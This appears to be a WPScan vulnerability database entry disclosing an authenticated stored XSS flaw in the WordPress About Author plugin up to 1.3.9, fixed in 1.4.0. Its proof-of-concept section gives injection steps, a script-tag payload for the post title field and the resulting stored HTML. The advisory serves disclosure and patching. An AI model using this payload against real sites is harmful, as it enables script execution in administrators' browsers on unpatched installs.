About Author <= 1.3.9 - Authenticated Stored Cross-Site Scripting (XSS)



Description
Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.
Proof of Concept
Stored Cross-site scripting (XSS):

- Using an Wordpress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in post_title input the following payload: `"><script>alert(1)</script>`
- Save. The Stored Cross-site scripting (XSS) vulnerability is affecting all pages/routes within the Wordpress Admin panel.

Stored response output:

<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>

Affects Plugin

fixed in version 1.4.0

References

URL https://nitesculucian.github.io/2019/10/25/about-author-1-3-9-authentificated-stored-xss-vulnerability/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Lucian Ioan Nitescu
Submitter Lucian Ioan Nitescu
Submitter Website https://nitesculucian.github.io/
Submitter Twitter LucianNitescu
Views 3997
Verified No
WPVDB ID 9930

Timeline

Publicly Published 2019-10-25 (9 months ago)
Added 2019-10-28 (8 months ago)
Last Updated 2019-11-28 (7 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin